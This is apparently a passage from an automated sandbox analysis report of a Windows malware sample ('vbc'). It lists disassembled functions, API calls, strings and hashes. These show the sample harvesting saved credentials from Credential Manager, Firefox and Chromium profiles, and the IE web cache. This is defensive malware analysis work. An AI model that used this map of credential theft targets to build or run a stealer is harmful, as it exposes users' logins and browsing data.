                                                                                                                                                    • wcslen.MSVCRT ref: 0040F421
                                                                                                                                                    • memset.MSVCRT ref: 0040F4A7
                                                                                                                                                      • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                                                                      • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                    • API String ID: 2775653040-3369679110
                                                                                                                                                    • Opcode ID: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
                                                                                                                                                    • Instruction ID: 627aa7309af3ce9e50a65207db29ad7cec2a96110015b88e099c10597549be0d
                                                                                                                                                    • Opcode Fuzzy Hash: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
                                                                                                                                                    • Instruction Fuzzy Hash: B15174729052196ADB20EB51CD85ECF73BC9F54304F5004FBF508F2081EBB96B888B69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041139E Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 539 41139e-4113a1 540 4113f3 539->540 541 4113a3-4113f2 LoadLibraryW GetProcAddress * 5 539->541 541->540
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                    • API String ID: 2238633743-70141382
                                                                                                                                                    • Opcode ID: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                                                                                                                    • Instruction ID: b0fa25657284a8e9196716ee499a251a0e3e908d4b843c37df8f242eb1d66817
                                                                                                                                                    • Opcode Fuzzy Hash: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                                                                                                                    • Instruction Fuzzy Hash: A3F03478988704AEEB30AF75DC08E07BEF0EFA8B11721892EE0C593650D7799441EF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408619 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 542 408619-408637 call 4037c3 545 4087f2-4087fe call 40383e 542->545 546 40863d-408646 542->546 547 408657 546->547 548 408648-408655 CredEnumerateW 546->548 550 408659-40865b 547->550 548->550 550->545 552 408661-40868a wcslen 550->552 553 408690-408692 552->553 554 4087ec 552->554 553->554 555 408698-4086b8 wcsncmp 553->555 554->545 556 4087dd-4087e6 555->556 557 4086be-4086d5 555->557 556->553 556->554 557->557 558 4086d7-40870b call 403853 557->558 558->556 561 408711-408737 memset 558->561 562 408739 561->562 563 40873b-408781 memcpy 561->563 562->563 564 4087a0-4087bc wcschr 563->564 565 408783-408795 _wcsnicmp 563->565 567 4087c7-4087d7 LocalFree 564->567 568 4087be-4087c4 564->568 565->564 566 408797-40879d 565->566 566->564 567->556 568->567
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004037C3: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 00408652
                                                                                                                                                    • wcslen.MSVCRT ref: 00408678
                                                                                                                                                    • wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                                                                                                                    • memset.MSVCRT ref: 00408725
                                                                                                                                                    • memcpy.MSVCRT ref: 00408746
                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040878B
                                                                                                                                                    • wcschr.MSVCRT ref: 004087B3
                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 004087D7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                    • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                                                                                                                    • API String ID: 1313344744-1864008983
                                                                                                                                                    • Opcode ID: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                                                                                                                    • Instruction ID: ae9214853af189039b11f9ecdcfbf9e5a6a1e8940f9aa775dff38fc8017bd4cb
                                                                                                                                                    • Opcode Fuzzy Hash: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                                                                                                                    • Instruction Fuzzy Hash: E45129B5D00209AFDB20DFA4C981A9EB7F8FF08304F14446EE959F7241EB34A945CB19
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00442628 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 570 442628-442642 call 442838 GetModuleHandleA 573 442644-44264f 570->573 574 442663-442666 570->574 573->574 575 442651-44265a 573->575 576 44268f-4426de __set_app_type __p__fmode __p__commode call 412c59 574->576 577 44265c-442661 575->577 578 44267b-44267f 575->578 585 4426e0-4426eb __setusermatherr 576->585 586 4426ec-442742 call 442824 _initterm __wgetmainargs _initterm 576->586 577->574 580 442668-44266f 577->580 578->574 581 442681-442683 578->581 580->574 583 442671-442679 580->583 584 442689-44268c 581->584 583->584 584->576 585->586 589 442744-44274d 586->589 590 442752-442759 586->590 591 44280c-442811 call 442871 589->591 592 4427a0-4427a4 590->592 593 44275b-442766 590->593 597 4427a6-4427ab 592->597 598 442779-44277f 592->598 594 44276e-442772 593->594 595 442768-44276c 593->595 594->598 599 442774-442776 594->599 595->593 595->594 597->592 601 442787-442798 GetStartupInfoW 598->601 602 442781-442785 598->602 599->598 603 4427ad-4427af 601->603 604 44279a-44279e 601->604 602->599 602->601 605 4427b0-4427c8 GetModuleHandleA call 40e2f1 603->605 604->605 608 4427d1-44280a _cexit 605->608 609 4427ca-4427cb exit 605->609 608->591 609->608
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2827331108-0
                                                                                                                                                    • Opcode ID: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
                                                                                                                                                    • Instruction ID: 706d3d187beade5fd8be42c29aa928e65c4a76933a7b40434c1f532ca5c4ff1d
                                                                                                                                                    • Opcode Fuzzy Hash: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
                                                                                                                                                    • Instruction Fuzzy Hash: 1E51C674C00305DFEB21AF64DA44AADB7B4FB05B15FA0422BF811A7291D7B84982CF5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409508 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040952C
                                                                                                                                                      • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                                                                      • Part of subcall function 004090DF: memset.MSVCRT ref: 00409102
                                                                                                                                                      • Part of subcall function 004090DF: memset.MSVCRT ref: 0040911A
                                                                                                                                                      • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409136
                                                                                                                                                      • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409145
                                                                                                                                                      • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040918C
                                                                                                                                                      • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040919B
                                                                                                                                                      • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                                                                                                                    • wcschr.MSVCRT ref: 004095B8
                                                                                                                                                    • wcschr.MSVCRT ref: 004095D8
                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409607
                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 00409633
                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 00409644
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                    • String ID: visited:
                                                                                                                                                    • API String ID: 615219573-1702587658
                                                                                                                                                    • Opcode ID: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
                                                                                                                                                    • Instruction ID: 77a6c5406e07bb2a3f369751b76910ce3bd9900599f044f3c0855e39104cf3e1
                                                                                                                                                    • Opcode Fuzzy Hash: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
                                                                                                                                                    • Instruction Fuzzy Hash: 7F417F72D00219BBDB11DF95CD85A9EBBB8EF05714F10406AE505F7281DB38AF41CBA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408C67 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 636 408c67-408c93 call 4057c4 call 4059f7 641 408c99-408cd7 memset 636->641 642 408d8b-408d9a call 40580a 636->642 644 408cda-408cec call 405cf6 641->644 648 408d62-408d6f call 4059ba 644->648 649 408cee-408d0b call 408801 * 2 644->649 648->644 654 408d75-408d78 648->654 649->648 660 408d0d-408d0f 649->660 656 408d83-408d86 call 408037 654->656 657 408d7a-408d82 free 654->657 656->642 657->656 660->648 661 408d11-408d27 call 406295 660->661 661->648 664 408d29-408d34 call 408116 661->664 664->648 667 408d36-408d5d _snwprintf call 407ede 664->667 667->648
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                                                                                                                    • memset.MSVCRT ref: 00408CAF
                                                                                                                                                      • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                                                                                                                    • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,7519F560), ref: 00408D7D
                                                                                                                                                      • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                                                                                                                      • Part of subcall function 00408116: wcslen.MSVCRT ref: 00408125
                                                                                                                                                      • Part of subcall function 00408116: _memicmp.MSVCRT ref: 00408153
                                                                                                                                                    • _snwprintf.MSVCRT ref: 00408D49
                                                                                                                                                      • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
                                                                                                                                                      • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
                                                                                                                                                      • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
                                                                                                                                                      • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                    • API String ID: 2804212203-2982631422
                                                                                                                                                    • Opcode ID: 7bd5ab009cbfd9fcdb96c191ae6412ae2e80316867491f73be5c6299af195905
                                                                                                                                                    • Instruction ID: ce292a4a65043f2a6a20625204029b960355a9169e5f8c073e361fa6e4a76ec5
                                                                                                                                                    • Opcode Fuzzy Hash: 7bd5ab009cbfd9fcdb96c191ae6412ae2e80316867491f73be5c6299af195905
                                                                                                                                                    • Instruction Fuzzy Hash: 1E313E72D00219AADF50EFA5DD85ADEB7B8AF04354F50017FA508B21C1DE78AE458F68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00409A34 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
                                                                                                                                                      • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
                                                                                                                                                      • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                                                                                      • Part of subcall function 00409508: memset.MSVCRT ref: 0040952C
                                                                                                                                                      • Part of subcall function 00409508: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                                                                                                                      • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095B8
                                                                                                                                                      • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095D8
                                                                                                                                                      • Part of subcall function 00409508: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                                                                                                                      • Part of subcall function 00409508: GetLastError.KERNEL32 ref: 00409607
                                                                                                                                                      • Part of subcall function 00409657: memset.MSVCRT ref: 004096C7
                                                                                                                                                      • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
                                                                                                                                                      • Part of subcall function 00409657: _wcsupr.MSVCRT ref: 0040970F
                                                                                                                                                      • Part of subcall function 00409657: memset.MSVCRT ref: 0040975E
                                                                                                                                                      • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
                                                                                                                                                      • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
                                                                                                                                                      • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
                                                                                                                                                    • _wcslwr.MSVCRT ref: 00409AFC
                                                                                                                                                    • wcslen.MSVCRT ref: 00409B11
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                    • API String ID: 4091582287-4196376884
                                                                                                                                                    • Opcode ID: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
                                                                                                                                                    • Instruction ID: 093a45ac9553ae88d2071121675ee446b985e814abadd75c8d2b77a0ae050712
                                                                                                                                                    • Opcode Fuzzy Hash: 3dd2327b6272305899ca924f4fa588c8789c804827c02355519b96a796539c20
                                                                                                                                                    • Instruction Fuzzy Hash: F731D872A1015466CB20BB6ACC4599F77A8AF80344B25087AF804B72C3CBBCEE45D699
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004090DF Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 91COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00409102
                                                                                                                                                    • memset.MSVCRT ref: 0040911A
                                                                                                                                                      • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                                                                    • wcslen.MSVCRT ref: 00409136
                                                                                                                                                    • wcslen.MSVCRT ref: 00409145
                                                                                                                                                    • wcslen.MSVCRT ref: 0040918C
                                                                                                                                                    • wcslen.MSVCRT ref: 0040919B
                                                                                                                                                      • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                                                                      • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                    • API String ID: 2036768262-2114579845
                                                                                                                                                    • Opcode ID: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                                                                                                                    • Instruction ID: 077c1189ed55963ee46c09665a9aee7869ceb3b17950e6b23e47196ee9b08e55
                                                                                                                                                    • Opcode Fuzzy Hash: 9b210f72750b98862afc15587b3a75268b6b997e6569292da8b093e0b4a2481a
                                                                                                                                                    • Instruction Fuzzy Hash: 0B21D972A4411D66E710E651DC85DDF73ACAF14354F5008BFF505E2082FAB89F844A6D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00441683 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 219COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                                                    • Opcode ID: 12bdf7202536433b73b7b7e7b2d6f63e6cc165494f09a719a239059ada246e86
                                                                                                                                                    • Instruction ID: 3c8b5220aebea45aa68cfe54a9ecef019ebf38e5b75abdf02c998a5d3c6681b4
                                                                                                                                                    • Opcode Fuzzy Hash: 12bdf7202536433b73b7b7e7b2d6f63e6cc165494f09a719a239059ada246e86
                                                                                                                                                    • Instruction Fuzzy Hash: 8E71D4B1600301BFF310AF16DCC1A6ABB98BB45318F14452FF459DB252D7B9A8D18B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040320A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                                                                                      • Part of subcall function 00410168: memset.MSVCRT ref: 004101DA
                                                                                                                                                      • Part of subcall function 00410168: wcsrchr.MSVCRT ref: 004101F2
                                                                                                                                                      • Part of subcall function 00410168: memset.MSVCRT ref: 004102D9
                                                                                                                                                      • Part of subcall function 0040FF51: SetCurrentDirectoryW.KERNEL32(?,?,?,00403292,?), ref: 0040FF9E
                                                                                                                                                    • memset.MSVCRT ref: 0040330A
                                                                                                                                                    • memcpy.MSVCRT ref: 0040331C
                                                                                                                                                    • wcscmp.MSVCRT ref: 00403348
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403385
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                    • String ID: $J/@
                                                                                                                                                    • API String ID: 1763786148-830378395
                                                                                                                                                    • Opcode ID: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                                                                                                                    • Instruction ID: 978c6ac20941b4c482f16f8c8dbf1af5ea5d331337d981433e161efedc4cfbbc
                                                                                                                                                    • Opcode Fuzzy Hash: 3e2635990ef3ae62cb2be14a81d094d65f482a135f1bd9a19b0151f057080487
                                                                                                                                                    • Instruction Fuzzy Hash: 36416B71A083819AD730DF61C945A9BB7E8AF85315F004C3FE88D93681EB7896498B5B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EDFA Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 98COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F042
                                                                                                                                                      • Part of subcall function 0040F026: memset.MSVCRT ref: 0040F057
                                                                                                                                                      • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F080
                                                                                                                                                      • Part of subcall function 0040F026: wcscat.MSVCRT ref: 0040F0A9
                                                                                                                                                    • memset.MSVCRT ref: 0040EE42
                                                                                                                                                    • wcslen.MSVCRT ref: 0040EE59
                                                                                                                                                    • wcslen.MSVCRT ref: 0040EE61
                                                                                                                                                    • wcslen.MSVCRT ref: 0040EEBC
                                                                                                                                                    • wcslen.MSVCRT ref: 0040EECA
                                                                                                                                                      • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
                                                                                                                                                      • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$memsetwcscat$wcscpy
                                                                                                                                                    • String ID: history.dat$places.sqlite
                                                                                                                                                    • API String ID: 2541527827-467022611
                                                                                                                                                    • Opcode ID: 79052c9e259d4c4db0ec689992f98860fd40fbbfa98e25ce4c2c55694841dc80
                                                                                                                                                    • Instruction ID: 5a7552f2f2193819142f663f69cd0b376b18013dc8e05bcebec127321fadfdaa
                                                                                                                                                    • Opcode Fuzzy Hash: 79052c9e259d4c4db0ec689992f98860fd40fbbfa98e25ce4c2c55694841dc80
                                                                                                                                                    • Instruction Fuzzy Hash: AD315232D0411DAADF10EBA6D845ACDB3B8AF00319F6048BBE514F21C1E77CAA45CF59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410075 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 80COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wcslen$memsetwcscatwcscpy
                                                                                                                                                    • String ID: Login Data$Web Data
                                                                                                                                                    • API String ID: 3932597654-4228647177
                                                                                                                                                    • Opcode ID: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                                                                                    • Instruction ID: 391ffb8f75831278f4964df5f57522d74f6eb7522eeef9a3bb7e860aca09f0fd
                                                                                                                                                    • Opcode Fuzzy Hash: 350975586496b093848a9f674fd33517dd62bead458e0c7f943732b3c3b83fa5
                                                                                                                                                    • Instruction Fuzzy Hash: 3621B83294411C7BDB10AB55DC89ACA73ACAF10368F10487BF418E6181EBF9AEC48A5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415BAE Relevance: 9.1, APIs: 6, Instructions: 140fileCOMMON
                                                                                                                                                    Download Yara Rule
